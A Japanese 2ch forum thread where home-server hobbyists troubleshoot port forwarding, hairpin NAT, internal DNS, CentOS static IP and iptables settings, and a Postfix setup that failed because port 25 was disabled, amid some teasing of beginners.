UD04SS (EXPRESS CARD TYPE)もしくはMW-U2510SS2 (USB TYPE)という通信カードを
デスクトップＰＣに接続して、ルータやモデム等を使わずサーバーを作りたいと思います。

ポートを開放するところとか、検索しても見つかりません。
サーバは、WiMaxのデータ通信カードでもできるのでしょうか。

ポートを開放しなきゃならない理由って知ってる？
その通信カードにルータ機能まで入ってるとは考えにくいけど？

サーバはネットワークに繋がってるならサービスを提供することはできるよ

>>472
Windows XP以降ならWindowsのファイアウォール設定かな。
別途セキュリティソフトが入ってるならそちらでやるかもしれない。
Linuxとかなら逆に積極的に閉じないと危険。

質問させてください

TIS FWTKが今公開されてないから代わりにOpenFWTKってのを見つけたんだけど
make installまではしたものの全然ドキュメントが無くて設定方法が分かりません。。

これの設定方法どのへんに載っているか知ってる人いませんか。
OSはCentOS6.2です。

板違いならすんません

Windows マシンの中に突っ込んだVMware上に
Linuxを入れてポート解放するのはセキュリティー的にまずいのでしょうか？

>>473
ありがとうございます。
WiMAXのデータ通信カードだけでネットにつなぎ、自宅サーバを作るまでを
１ステップずつ教えてくれるサイトか何かがあれば安心なのですが･･･。

>>474
そのへんは、問題ないと思います。
当方、二重ルータ環境でどこの業者の誰がどう直してきたのかすら把握してません。
それでいて、仕事に使ってるからヘタにいじれません。
心配なのはむしろ、今つないでる方のブロードバンド無線ルータです。

>>467
スレ的には >>1読んで、が至極全う。

ただ、余りこれまでの回答に出てない
話として、dnsmasqでググって、
アプローチの仕方を検討してみたら
ヨロシ。

>>476
ちゃんと管理できてれば問題ないよ。

>>473
WiMAXの回線でクライアントサーバを作る時は、クライアント機のポートだけ開放したらいいんですか？

centos6なんだけど
フラッシュメモリとか刺して、安全に取り外す場合
GUIで立ち上げた時は右クリックでその項目が表示されるけど
CUIの場合はどうやって外すの？
そのままぶっこ抜いても大丈夫？
あるいはunmountのコマンドでいいの？

>>455
試験に通ることと実際に現場に立つことは雲泥の差だからな。
持ってる人と持ってない人も雲泥の差だけど。

>>481
GUIでやってることと同じこと（umount）をすればよろしいんじゃないですかね

>>480
普通はサーバー、クライアント共に必要なポートだけ開ける。
ていうかさ、サーバーで何をサービスしたいのかとかディストリも書かないで
何か具体的な回答が返ってくることを期待されても困るぜ。

>>481
ejectってコマンドもあるよ。

>>480
WiMAXはどうか知らんがEMなら普通の固定回線と何ら変わらん。
>>473の「ネットワークにつながってるなら」云々はこの意味だと思うぞ。

加入プランによってはキャリア側でポート制限かかってるからそこだけ注意な。

>>477
予備知識がないならルータ設置してLAN構築しろよ
応用的なことは基本ができてからするもんだ

普通に通信開始して各種セキュリティ設定を行うだけだがな
ルータが無い分だけ通常より侵入されやすくなってるから
FWとかセキュリティ設定はしっかりしとけよ

>>1を思いっきり読み返したのですが、未だに解決していません…。
環境としては

メインPC-----¬
　　　　　　　　　　ルータ---WWW
サーバPC-----」80開放

と、一般的な構成だと思います。
この状態で
「メインPCからDDNSのURLを叩く」→「ルータを経由してWWWへ」→
→「DNSサーバでアドレス変換」→「ルータの80番を叩く」→「サーバへ」
という構成にしたいのですが…
以前、別のルータ内蔵ONUを使っていた時には出来ていた記憶があるのですが、
やはりルータ側の原因でしょうか。

>>1を思いっきり読み返したのですが、未だに解決していません…。
それでは、もう一回読み直せ。
答えのリンク書いてあるのにわからないって、これから先も茨の道だろうな。

>>489
ようやく出来ました…hostsファイルが原因だったのですね。
それを使わない方法を探していたせいで躓いていたようです。
スレ汚し失礼しました…ありがとうございます。

>>490
ちょっと違う。hostsファイルは原因では無く、問題を
回避する手段だよ。この違い位は理解していないと
あぶなっかしいなぁ。

「センス無ぇ〜〜」を目の当たりにしてしまった。
まぁ、誰にでも最初はあるだろうからこつこつとググるクセをつけていけば
何とかなると思うが、、、、、、ガンガレ。

>>491-492
なんだかいよいよチンプンカンプンになってきました…orz
もう少しググってみます。

>・外部からはﾋﾟｺｰﾝなのに内部からはｼｮﾎﾞｰﾝです
ttp://www.dotup.org/uploda/www.dotup.org3013935.png

どんな事が書いてあるのかと>>1 を見ようとしたらヤヴァイサイトとか

>>493
上で出したﾋﾟｺｰﾝとｼｮﾎﾞｰﾝのヒントだけじゃ分からなかったか？
んじゃ、ヘアピンNATでぐぐっとけ。
つーか、そのページに理屈やらなにやら色々書いてあるんだけどな。
プライベートIPアドレスとグローバルIPアドレスの違いを知っていれば理解しやすいかもな。

>>495
ヘアピンNAT…初めて聞きましたorz
ザッと調べたところ、非対応のルータもあるようですね。
現在使っているルータは明示的に対応を謳っていないので、サポートに確認してみる事にします。
一応、小規模のネットワークの構築はやってたんで、IPの違いは把握してるつもりでしたが…自信喪失もいいトコですorz
ともあれ、スレ汚し失礼しました。なんとかやってみます。

もうヘアピンNATテンプレに入れとけよ
これで何度目だ

>>497
説明自体は入ってるよ。
補足が必要ならwikiを修正する案だしてくれ。
別に俺が直す訳じゃないが、修正合戦になるのは嫌だ。

>>495
毎回思うんだけれど
単に内向きのdns用意すれば
良いんでないの？

わざわざルータで対応する
メリットがわからん。

ルータで解決すれば、クライアントもサーバも何もいじらなくて済むから。

内向きDNS何か立てているのは少数派

わざわざDNS鯖で対応する
メリットがわからん。

>>501
全端末でhostsが書けるとは限らんからな。
スマホやらタブレットがあったり、家族も使ってたりするとDNS立てた方が早い。

>>501
考えは人それぞれと思うけど、
Natループバックに対応する
ルータを選ばなきゃ行けない事は
デメリットでは。

企業で業務サーバがいじれないから
他で内向きのdnsを用意するとかなら
確かに面倒だけど、
自宅でやる分には、webサーバと一緒に
dnsmasqとか動かして、自分に最初に名前を
聞くような設定をdhcpで振り分けると
良いのではと思う。

端末は自動設定にしとけば良いし、
自宅LANのアドレスも一元管理できる。

うちでは古くなって退役させたLinkStationを改造して内向けDNSに。ルータのDHCPは停止で。
スマホにIP直叩きされると、、防ぎようがないが。

>>501
それは所有機器が少ないからだよ。
マシンが増えると1台づつローカルアクセス用に設定するのが面倒くさいし、
ホスト増えた時の更新も非常に面倒くさい。
向きDNSがあれば1台だけ設定変更すればいいから楽。

あと、OSでドメインSuffixを設定すればホスト名だけで他の鯖にアクセス出来て便利。
でも鯖を外側のみか特定の倉からしか使わなかったり、
そもそも所有マシンが少ない人にはあんまりメリット無いよ。

俺から言わせればhosts触る方がメリット感じない
セキュリティソフトがご丁寧に邪魔してくれたりとか考えるとDNSでいい

名前解決の必要性を感じないなら設定しないという手もあるし

>501 人気でわろた。

ここは自鯖板
一夜たっても意見は変わらんな
内向きDNS鯖立てるならルーターに仕事させるだろ

まぁ俺はそんなアレに依存しない環境を構築しているけど。

[Internet](100Mbit)
|
[ONU]
|
[HUB(1Gbit)]
|
[GW router1](ISP1)
[GW router2](ISP2)
|
[HUB(1Gbit)]━[PC2](ISP1)
(3F)
|
(CAT6e)
|
(1F)
[HUB(1Gbit)]┳[PC1](ISP1)
　 　　　　　 　┣[Server](ISP2)
　　　 　　　　 ┗[AP]┳[PC3](ISP1)
　　　　 　　　　　 　　┗[NotePC](ISP1)

何か必死なのがいる

ですね。自分の構成書いてドヤ顔してる方もいるし。

シングル・ユーザ・モードで文字が小さくてとても不便なんだけど
あれって文字大きくできるの？
ターミナルコンソールの場合は文字は大きくできるけど・・・

シングルユーザーモードで文字が小さくて不便、という意見は珍しいな

以前、無料のダイナミックDNSを利用するためdynってとこでアカウント作ったんだけど
使わなくなって久しいので解約しとこうと思ったらログインできず、
外部から自宅へのアクセスもできなくなっていた。
ああいうのって一定期間アクセスがないと削除したりしてるのかな

>>513
DynDNS使ってた頃はアラートメールが来てたな。
その後更新できない環境になって、気づいたらドメイン消されてた。
ついでに選べるドメインがものっそい減ってた。

>>514
おお、ありがとうー。体験談ありがたい。
ちょっと気持ち悪いけど、まあ消されたんだろうし、早く忘れようｗ

そうやって最初だけのアフォがいるから
あちらが困ってるんだろ

VDSLにルータを接続し複数のPCから無線でネットが出来る様にしたいのですが
うまく出来ません。しかも奇怪なエラーが出ており困っています。
何が問題なのでしょうか？

フレッツ（マンション：VDSLタイプ）に加入しました。

�@ VDSL + PC(有線で結合）
問題無くインターネット接続出来ます。

�A VDSL + ルータ + PC(ルータとPCは接続しません。）
接続出来ません。

また、ルータに付属の接続アプリに従って進めていくと

WAN Miniport(PPPOE)経由で接続中...
↓
エラー 651：モデムまはたほかの接続デバイス）からエラーが返されました。

★種類
VDSL：VH-100<4>E<S>
ルータ：LAN-W300/G8

「ルータとPCは接続しません」ってのがよくわからんが、
そもそもその「VDSL」ってルータ機能持ってね？
だったら追加しようとしてるルータでPPPOEっておかしくね？

>>518
工事の人に確認しましたが
届いたVDSL：VDSL：VH-100<4>E<S>
にはルータ機能は無いそうです。

その為、ルータを購入し接続を試みるもダメな状態です。。。
毎回有線のつけかへはめんどくさいなぁ。

そもそもこのスレでする質問としておかしくね？

>>520

ネットワーク板をのぞいてきましたが
ファイル交換等の違法なスレッドしかありませんでした。
また、知識レベルもこちらの板の住人の方の方が数段上かと思って質問させて頂いてます。

＞�A VDSL + ルータ + PC(ルータとPCは接続しません。）
要するに　PC は無線で最終的には接続する為、
LANケーブル等は接続しないという意味です。

>>517
エラー 651 のメッセージでググるとWindowsのPPPoE機能で接続しようとして
繋がらないエラーのようだが、ルータ導入したんならPPPoEじゃダメだろ。
ルータのマニュアルに、Windowsの設定のこと何か書いてないか?

スレ違いだが釣られてみる

・契約しているISPの接続(認証)方法を確認する
・ルータとPCを繋ぎ、ルータにISP接続設定を登録する
・VDSLモデムとルータを繋ぐ(ルータのWAN側と繋げ)
・PCに設定しているPPPoEクライアント機能を停止させる。判らないなら接続ツールのアンインストール。
　PCの再起動を求められるかもしれない。管理者権限を持つユーザで操作すること
・(念のため)ルータの再起動
・無線LANの設定等は適宜

>>521
＞PC は無線で最終的には接続する為

それ接続って言わんか・・・？

>>522 >>523 >>524
ありがとうございます。
NTT付属の　簡単接続ツール　　が簡単な事を無駄に複雑にしてくれていました。

NTTのインチキ簡単接続ツールには設定はまかせられません＾＾；

Thank You !

自分の知識不足を棚上げして接続ツールに文句とか酷すぎるな。

自分の知識不足という知識が不足

質問です。
マンションにＮＴＴ光回線を引いているとします。

回線は同じで、それぞれ３つの異なる固定IP（プロバイダ）を契約したとします。
その場合、1つのルータで３つのIPでサイトを運営する事は出来ますか？
（バーチャルホストだとIPが同じになってしまいますので）

[ やりたい事 ]
プロバイダＡ―――サイトＡ 202.111.111.111
プロバイダＢ―――サイトＢ 202.222.222.222
プロバイダＣ―――サイトＣ 202.333.333.333

しかしスレチどころか板違いなやつに親切なやつらだな

この前も似たような質問あったような希ガス。
繰り返される質問だね。

>>530
繰り返された、というレス番号をプリーズ

なんかデシャブでしょ

>>528
ルータがそういう構成に対応できるやつならOK。

ちなみに1つのIPアドレスでたくさんのWebサイトを運用することもできるぞ。

>>528
それをやるのがまさにバーチャルホストなんだぜ

IP同じにしたくないからつってプロバイダ複数契約するくらいなら
VPS借りれば良いと思うの

>>533 >>534
ＩＰアドレスも分けつつサイトを運用したいの。

>>535
何の制限もなく、好きな様にいじりたいおしたいからだろ。

この知識レベルで「弄り倒」せるのかなｗ

>533の言うとおりで、ルータのマニュアルとにらめっこしたらいい話。

うんぼろぼろぼーーーーーーーーーー・・・・・・

不正解です・・・質問者、ざんねーーーーん！！

　　　　∧__∧
　　　 (｀･ω･´) 　　　　　　2chは修行の場なり。
　　　.ノ^　yヽ、 　　　　　　嵐やアフォを乗り越える
　　　ヽ,,ﾉ==l ﾉ 　 　　　　　質雑運営は至難也
　　　　/ 　l |
"""~""""""~"""~"""~"

　　　　∧__∧
　　　 < ｀w´ > 　　　　　　2chは修行の場なり。
　　　.ノ^　yヽ、 　　　　　　嵐やアフォを乗り越える
　　　ヽ,,ﾉ==l ﾉ 　 　　　　　質雑運営は至難也
　　　　/ 　l |
"""~""""""~"""~"""~"

　　　　∧__∧
　　　 .( ｀ﾊ´ ) 　　　　　　2chは修行の場なり。
　　　.ノ^　yヽ、 　　　　　　嵐やアフォを乗り越える
　　　ヽ,,ﾉ==l ﾉ 　 　　　　　質雑運営は至難也
　　　　/ 　l |
"""~""""""~"""~"""~"

http://www.uploaderbox.com/?d=4FC0B8741

iptables/とルータの設定を正常に行っている
つもりなんですがどうもポート開放が出来ません。
どこに落ち度がありますか？

< iptables >
-A INPUT -p tcp -m tcp --dport 80 -m state --state NEW -j ACCEPT

< router > port forwarding
192.168.2.xxx TCP+UDP 80 WEB SERVER

知りません

>>544
問題の切り分け。鯖のポートを全解放してルーターの静的NATが効いてるかを確認。

>>544
切り分けは大切なので、>>546に加えて例えば、
・そもそもhttpdがちゃんと動作しているのか? netstat -nlpで確認。
・LAN内から接続できるのか?
・iptablesはESTABLISHEDやRELATEDのルールもちゃんとあるのか?
・httpdのエラーログに何か出てないか?

>>546 >>547
・そもそもhttpdがちゃんと動作しているのか? netstat -nlpで確認。
・LAN内から接続できるのか?
→CentOSにWindows7から接続しApacheが起動している事の確認は取れました。

・iptablesはESTABLISHEDやRELATEDのルールもちゃんとあるのか?
・httpdのエラーログに何か出てないか?
→今日、午後から確認します。

やはり、気になって眠れないのでこれだけメモしておきたいと思います。

宅内のネットワークは次の様な感じになっており
サーバ以外は全て無線でネットワークに繋げています。

そして、外部からアクセスがあった場合には、
下の図で言うところの [Server:CentOS6:192.168.2.99] 上の
Apacheのコンテンツを表示させる為に、ルータの設定画面にてポート転送設定を
192.168.2.99 に80番の解放として行っています。

【オレッチのネットワーク】
[provider:fixed ip:202.222.222.222]--[VDSL]---[router]
　　　　　　　　　　　　　　　　　　　　　　　　|------[PC:Windows7: 192.168.2.1]
　　　　　　　　　　　　　　　　　　　　　　　　|------[PC:Windows7: 192.168.2.2]
　　　　　　　　　　　　　　　　　　　　　　　　|------[PC:Windows7: 192.168.2.3]
　　　　　　　　　　　　　　　　　　　　　　　　|------[PC:Windows7: 192.168.2.4]
　　　　　　　　　　　　　　　　　　　　　　　　|------[Server:CentOS6:192.168.2.99]

http://192.168.2.99/
→ＯＫ：でアクセスすると正常にApacheが返すコンテンツを見る事が出来ます。

http://202.222.222.222/
→ＮＧ：※ポート80が解放されていない為に、外部回線より当該URLにアクセスしても
何も応答がありません。

ちょっと図がずれてしまいましたが
当然　router 経由でマシンは全てつながっています。

なんで以下のように描けないかな。
構成説明の勘所だろうに

> 【オレッチのネットワーク】
> [provider:fixed ip:202.222.222.222]
> 　　|
> [VDSL]
> 　　|
> [router]
> 　　|------[PC:Windows7: 192.168.2.1]
> 　　|------[PC:Windows7: 192.168.2.2]
> 　　|------[PC:Windows7: 192.168.2.3]
> 　　|------[PC:Windows7: 192.168.2.4]
> 　　|------[Server:CentOS6:192.168.2.99]

>>551
見やすい。

メールについて質問なんですが、

http://centossrv.com/postfix-tls.shtml
こちらを参考に証明書を発行して
SSLを使うための各種設定を終えました。

Postfix用にポート465番
Dovecot用にポート995番
をOPENとありますが、確認すると接続できませんと出ます。
iptablesでポートを許可するだけではOPENしたことにならないんですか？


「/sbin/iptables -L」を試したら設定されているのですが、

「nmap localhost」を試したら
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
143/tcp open imap
465/tcp open smtps
953/tcp open rndc
3306/tcp open mysql
10000/tcp open snet-sensor-mgmt

となっていて、995が開いてない？？
そもそも、OPENと書いてある465も外部からアクセス出来ませんでした。


他に設定するところがあるんでしょうか？

あ、VPSでCentOS Linux 5.8を使用してます

>>549
LANから接続できるならルータの問題じゃね？
どこのルータ使ってるか知らんけどNATとフィルタの設定が別になってる場合もあるよ

ルータによってフィルタを通ってからNATを通るものと
NATを通ってからフィルタを通るものとあるよねｗ

VPSって板違いだろ。

VPSで鯖をやってるつもりの奴は心がない。自宅で鯖を公開してる奴は頭がない。

>>546
現在、ルータに対して下記状態で接続をしています。
Apacheが起動した状態で�@から�AはローカルIPで問題無く見えますが、
外部のポート開放チェックサイトや別回線でチェックした場合
ポートが閉じています。

�@ Windows 7 [無線]
�A Server CentOS6 　[有線]

＞静的NATが効いてるかを確認。
これを確認する為のヒントをお願い致します。

因みにですが、
ルータに対して、ポート転送設定 + DHCP設定で�Aの内部IP+MACアドレスを設定したあとで
VDSL + ルータ + �A全てを再起動してもみましたが、やはりポートが閉じたままです。

ただ、内部IPを指定し�@から�Aのページが見えている事より�Aに対するiptablesの設定は動作していると思われます。

そもそもの質問になってしまいますが

ルータに接続されたマシンがPCの再起動等を行う度に
プライベートIPが変化します。

これを固定化する為のルータの設定画面として
【固定DHCP設定】画面があり、
・IPアドレス
・MACアドレス
を入力し登録すればプライベートIPアドレスが固定化されるという認識で良いでしょうか？

>>560
それでもいいし、DHCPで割り当てないIPアドレスブロックを設定した上で
PCに固定でIPアドレス設定してもいい。
万が一ルータがコケてもいい後者がお勧め。

>>560
今までサーバのIPをDHCPで設定して、そこにNATかけて外から見れんと言ってたのか？

> 【オレッチのネットワーク】
> [provider:fixed ip:202.222.222.222]　///　NAT：222.222.222.222:80 <-> 192.168.2.99:80(Server:CentOS6)
> 　　|
> [VDSL]
> 　　|
> [router]
> 　　|------[Server:CentOS6:192.168.2.99]

ルータで↑の通りルータのWAN側IPアドレス(222.222.222.222:80)へ来た通信の宛先IPを
LAN側にいるサーバ(192.168.2.99:80)へ変換しますよ。って静的に設定してんのに、
サーバのIPが動的にコロコロ変わってたらNAT変換先のIPアドレスが存在しなくなって通信できないだろ。
>>561が言うようにサーバのIPをDHCPから手動設定に切り替えてそのプライベートIPに対してNATかけな。

>>561 >>562
詳しくご説明頂きましてありがとうございます。
さっそくアドバイス通り試してみます。

今日は、もう眠たいので落ちます。

同一ネットワーク内で

postscript
Windows サーバ　+　Linux サーバとか混在させて遊んでみたいなぁあああ

>>562が怒り心頭であろうことは想像に難くない。
いや「やっぱりこいつアフォや」と思ったのかな。
>>562乙

この手の子は手順だけ得ようとするのが不安でならない。
勉強しろとまでは言わんが、せめて仕組みを理解しとかんと後で困るのだがなぁ。

鯖質問スレだと思ったら、NW質問スレだったでござる。

結構重なる部分はあるけど、
やっぱり混同されちゃうのかネェ　鯖と網

チンＰマンＰネットに聴いたらいいのにね

ルータの接続設定画面においてプロバイダへの接続設定を
動的に切り替えるツールとかってありませんか？

[email protected]
passhage

[email protected]
passhage

無ければ、Windows APIを使用して直接ウィンドウ操作する
しかないのかなぁ？

>>567
外部のネットワークに繋がってないと意味がないサーバが多数だからある程度は仕方ない。

>>569
接続設定を童貞に切り替えるの意味がわからない。
何のためにどのタイミングで何の接続設定を変えるんだ？ユーザ名？ISP？

>>571
自作自演をする為にIPを切り替えたいのでしゅ！！

＞ルータの接続設定画面においてプロバイダへの接続設定を
＞動的に切り替えるツールとかってありませんか？

自演時にISPへのPPPoE接続を切り替えるんじゃなくて
ルーティングでWAN側から出てく時のソースIPを変えるってことだろ？
業務用の機器なら如何様にもできると思うが、
おもちゃレベルの機器なら素直にルータ2台使ってPCのデフォ変えるのが早いと思う。

>>495
遅レス失礼しました。
ヘアピンNATについて調べて、ルータのメーカーに問い合わせたところ、ルーター側で非対応との事でした。
苦肉の策ですが、暫くはhostsで行ってみようと思います。
ヒントをくださってありがとうございました。

PostfixとDovecotの組み合わせで、
同じアドレス内でのメール送受信はできるんだけど、
外部からのメールが受信できないって場合は、
どんな問題が考えられる？

[email protected]から[email protected]へは大丈夫だけど
[email protected]から[email protected]へはダメ。

外部からの時はMaildirにメールが届かないんだ・・・（泣）

ログは？

>>576
詳細なログを見るためにmaster.cfにて「-ｖ」を付けて
smtps inet n - n - - smtpd -v
として、outlookで同一IPで作った別のアドレスに送りました。

しかし今度は、
/var/log/maillogに書かれた量が膨大すぎて、どこを見ていいやらわかりません（泣）

今、送受信できるタイプと、できないタイプのログを見ていたら決定的な違いがありました。

自分宛に同一アドレス内の場合は
[email protected]から[email protected]へ送る時はログが出力されますが、

自分宛にGmailなどから送った場合は
[email protected]から[email protected]へはログがまったく出ません。

送信は同一アドレスでも、Gmailでも送れるんですが、
受信だけ、外部から受け付けて無いようです。
このような経験された方いますか？

名前解決できてなくてメールが迷子になってる
お前の環境が分からんからそれくらいしか思いつかん

名前がわからないということはDNSあたりを疑ったほうがいいのでしょうか？

ついでと言ってはなんですが、もうひとつ疑問がありまして、
よくメールサーバはmail.example.comとなってることが多いと思うのですが、
私は今回ホームページにアクセスするアドレス（example.com）と同一にしているんですが、
問題無いですか？

DNSのMXレコードに所有ドメインのメールサーバーが登録されてるかクエリーを投げて確認した方が良いんじゃ無いかなぁ

MX設定してないんじゃないか?
あと、ログは-v付けなくてもなんか出てるはず。

いくら何でも登録自体を忘れているなんて落ちは無いだろ…
独自ドメインじゃ無くてオレオレドメインで動かしているって言う落ちもあり得ないだろうしな…

試してみました

# nslookup
> server 163.0.0.0
Default server: 163.0.0.0
Address: 163.0.0.0#53
> set q=MX
> example.com
Server: 163.0.0.0
Address: 163.0.0.0#53

example.com mail exchanger = 10 example.com.
>

と、なりました。
おそらく間違ってないと思うんですが、どうでしょうか？

なにやらnslookupの使い方の解説を見ていたら、<fqdn>というものがあるらしいので試したところ

> <fqdn>
Server: 163.0.0.0
Address: 163.0.0.0#53

** server can't find <fqdn>: NXDOMAIN

と、出ました。
この辺がおかしいですか？

>>584
それ自鯖で名前解決した結果？
自分宛に出したメールは受信できるなら、何の役にも立たないと思うけど
外部からping飛ばすとかポートスキャンしてみるとかして名前解決できるか試したら？

ところでルータの25番ポートは開けてあるよな？

DNSの問い合わせ先をプロバイダのDNSやGoogleのDNSに設定してクエリを投げたらどうなる？
あとそもそも外から中のメールサーバーに接続できてない可能性もあるかもしれない
どっか防壁のそとから接続ができるか試してみるとか

皆さんアドバイスありがとうございます。
なにぶん初心者なもので、そういった確認方法があることすら分かりませんでした。
アドバイスを参考に、確認してみます。

>>586
SSLを使っているので465と995を開けて、それは開放、確認済みです。
ひょっとしてSSLを使ってる時でも25番を開けておく必要があるのですか？

>>587
>DNSの問い合わせ先をプロバイダのDNSやGoogleのDNSに設定してクエリを投げたらどうなる？
すいません。ぐぐってみましたが、方法がわかりませんでした。
どうやって調べたらいいでしょうか？

>>588
メールサーバからメールサーバへの転送は25番で行われるからな
開けてないなら届かなくて当然じゃね？

ちょっと訂正
メールサーバからメールサーバへの転送→メールサーバ同士の通信

とりあえず、
http://www.cman.jp/network/support/nslookup.html
こちらで試したところ、
メールサーバは指定したとおりに表示されました。

>>590
そこもsmtpsとpop3s使ってると思ったんだけど・・。

>>592
使ってないよ。だから悪意あるメールサーバ挟んだらメールの内容盗み取られる。
SSLを使ってない理由が知りたいなら悪いが検索してくれ。上手く説明できない。

メールサーバ同士のリレーは通常port 25で開始して
「メールサーバ同士が合意したらSTARTTLSで昇格してSMTP over TLSでリレー」
する場合もある。(合意できなかったら平文でリレー)
ただしメールサーバ同士のリレーではport 465のSMTPSは普通使わない。

元々はSimpleMessageだからな。仕方ない。

やぱりポート25番が原因でした
>>589さん、他アドバイスいただいた皆さま、ありがとうございまいした。

SSLで暗号化するのに465番を使うんだから
スパマーに狙われる25番を閉じるはずだと勝手に思い込み、
Postfixのmaster.cfにある「smtp inet n - n - - smtpd」を
コメントアウトしていたのが原因でした。

早とちりというか、素人ゆえの思い込みから何日も悩んでしまいました。
相談に乗っていただかなければ「あってるはずだ」とまだ悩んでたと思います。
本当にありがとうございました！

思い込みは個人、商用問わず鯖運営の最大の敵。

「受信専用サーバなら25番ポートは空けなくて良いよね」
なんて勘違いしていた時代が私にもありました。

（社内ネットワーク上に悪い人がいないという前提で）


ルータ設定画面へのログイン情報が　admin / admin のままなんですけど
別に外部からアクセス出来ないので（ 192.168.2.5) 問題はないでしょうか？

悪意は無くとも勘違いで操作されたり、
WAN側でWebGUIが叩けるとかいうオチが無ければいいんじゃねえの？ｗ

webセットアップは状態表示だけに限るとか、詳細設定はローカルコンソールに限るとか、
特定のMACだけで、指定のポートで接続してきた場合に限定するとか、やり方はあるじゃろ。
外部から遠隔操作されたボットが内部に発生した場合、どういう風に防御するのかな?
そこで好き放題されたとき、失うものや かけられる嫌疑など、
どこかの原発事故みたいに最悪の事態を考えた上で策を考えて施工しておかないと、
うちは小さいからいいやで、乗っ取られることになると思う。
まぁ、可能性の話で被害を極小化してしまうという愚行もできるけどさ。

>>600 >>601
サンクス。

とりあえずパスワードをもっと複雑にしますわ。

↓このサイトを見ながらIPアドレスの固定化を行っているんですけど
そのうち　NEWORKというのはタイプミスですか？
正しくは、 NETWORK　として設定するのが正しいと思うのですがいかがでしょうか？
http://blog.veryposi.info/server/server-setup/centos-dhcp-ip/


DEVICE=eth0
ONBOOT=yes
IPADDR=192.168.25.134
NETMASK=255.255.255.0
NEWORK=192.168.25.0
BROADCAST=192.168.25.255

そうだね

ブログにメモするならしっかりメモして欲しいものですね。
私の方はしっかりしたメモを残すことにします。

別に

vi /etc/sysconfig/network


NETWORKING=yes
NETWORKING_IPV6=no
GATEWAY=192.168.1.1　　←　ここって GATEWAY or HOSTNAME どちらを入力するのが正しいですかね？

どうもポートの開放がうまくいかない。

gateway

subway

> GATEWAY=192.168.1.1　　←　ここって GATEWAY or HOSTNAME どちらを入力するのが正しいですかね？
> どうもポートの開放がうまくいかない。
・・・ポートの開放と何か関係が？

>>610
CentOS ＩＰアドレスの固定 をするに際して
/etc/sysconfig/network
の修正をしたりもするでしょ？

若干の表現作法に違いはあるにせよペンギン系のきほんじゃまいか

くだ質は初心者スレじゃないんだし、入門書買ってこいとしか。

>>612
ペンギン系って何よ？

なぜ「両方やってみる」ことをしないのか

>>603
何も考えずに丸コピペしかできない人ってこういうのに引っ掛かって騒ぎ立てるね

構文の意味を理解すれば分かると思うけどね
慣れてないならX11からGUI経由で設定すればいいんだし

>>610
つか、そこ弄るのってNIC追加・交換したときかIP変えるときだけじゃね？
そうでなきゃインストーラにやらせたまんま。公開鯖でDHCP割当なんかに普通使わないし。

>>618
固定IPをサーバに振りたいんですよ。
なので設定しとるとです。

がうまくポート開放ができないとです。
CentOS5の時にはポート開放とか結構簡単にできていたんだけどなぁ。

/etc/resolv.conf
へ記入すべき内容なんですけど
www.linux-beginner.com/linux_setei2.html　
を見た限りでは、↓のとおりなんですけど

nameserver 192.168.0.1
nameserver 192.168.0.2

そもそも
固定IPを引いており
[vdsl]
　　|
[rooter]
　　|
[server]
この状態で接続している場合に入力すべきDNSのIPって何になるのでしょうか？
というのもそもそもDNSサーバなんてないのですが。

相変わらずポート開放がなぜか出来ず困ってます。

iptablesは次の状態に書き換えを行っているのですが
設定的には問題無いですよね？

# Firewall configuration written by system-config-firewall
# Manual customization of this file is not recommended.
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -p icmp -j ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state NEW -m tcp -p tcp --dport 80 -j ACCEPT
-A INPUT -j REJECT --reject-with icmp-host-prohibited
-A FORWARD -j REJECT --reject-with icmp-host-prohibited
COMMIT

日記はブログにでも書いてろよ
書式が気になるならmanを使うか入門書立ち読みしとけ

つかCentOS5の時と同じ値を設定すりゃいい話なんじゃねーの
そこの部分は変わらねーべよ

あとDNSが無いならISP指定のDNSかルーターでも指定しとけよ

>>623
たぶん、>>621は iptables への設定内容として正しいですよね？
という事を聞いているんだと思うよ。

iptablesを外してポートが通るならiptablesの設定が間違ってるんだろうし
外してもポートが通らないんならそれ以前の話だろうがよ

「何故か」を自力で解決するつもりがないなら自宅鯖なんて窓から投げ捨てちまえ

本当にサーバ構築の経験があるなら>620みたいな事書かない。つーか書けない。
名前解決をしているのがどれか分からないってPC初心者だろ。
固定IPアドレスは攻撃に晒されやすいからID:U9+fYXJ4はそのまま諦めるべきだと思う。
どうせ10分程度で踏み台にされるのがオチだ。

だいぶ基本を端折ってるみたいだね。
すぐに結果だけを求めるのはイクナイ。
お勉強がてらやってるなら尚更。

おまいら手加減無しに叩くのなw

自宅鯖立てるって、ある程度基本的なことを知っているレベルに達していることが前提だからな
「これから頑張る！」ならいいが、そんな風にも見えないし

とりあえず、色々的外れな質問している人はLinux初心者スレとかに行ったほうがいいと思うぜ

>>629
自宅鯖を立てようとしている奴がアドレスを固定する方法とか
リゾルバの問い合わせ先に何を設定したら良いのですかとか聞いてきたら
そりゃおめー張り倒したくなるだろ

車で言うと右左折する方法聞いてくるレベル。
なにもわかってない。ヤバい。

百歩譲って質問スレでの質問自体は問題ないとしても、
その程度の質問をしているって自覚がないままではまずいよな。
自覚があればそもそもそういう質問ができないはずなんだ。
ひたすらググるとかビギナ向けの鯖運営指南書などを買って
知識を蓄えてから実践するべきだったと思う。やっぱりダメダメだな>620

いいね。ドライなかんじで。

スーパードライの季節です

これでも、宅鯖板は2chでは優しい方だよな。

よくねーよ。

ググってるか?

>>637
まあ、まずは問題点を切り分けるために>>625を試すべきだね。

ポート解放って言い方が気に食わんけど、
iptablesさわるのがわからんなら、X立てて、firestarterでも使った方がいいんじゃないか？

>>638
当たり前だろ。

>>625 >>639
試しましたが、それでもやはりポートが開かんとです。
[root@localhost ~]# /etc/rc.d/init.d/iptables stop
iptables: ファイアウォールルールを消去中: [ OK ]
iptables: チェインをポリシー ACCEPT へ設定中filter [ OK ]
iptables: モジュールを取り外し中: [ OK ]

>>640
ちょっとやってみます。

開き直ったよこれwww

ちなみに

システム ＞ 管理 ＞ ファイアウォール

と進むとGUIでファイアウォールを設定出来るウィンドウが
起動しますが、別にここからiptablesをいじってもよいのですよね？

>>641
じゃfw以前の問題じゃん。LAN内で繋がってるなら
ルータの設定か鯖のNICの設定タコってるとしか。

ディストリビューションなんなんよ…
そういうツールあるならまず使ってみようよ…

実はhttpdがtcp:80でLISTENしてないとかいうオチもありそうだな

>>645
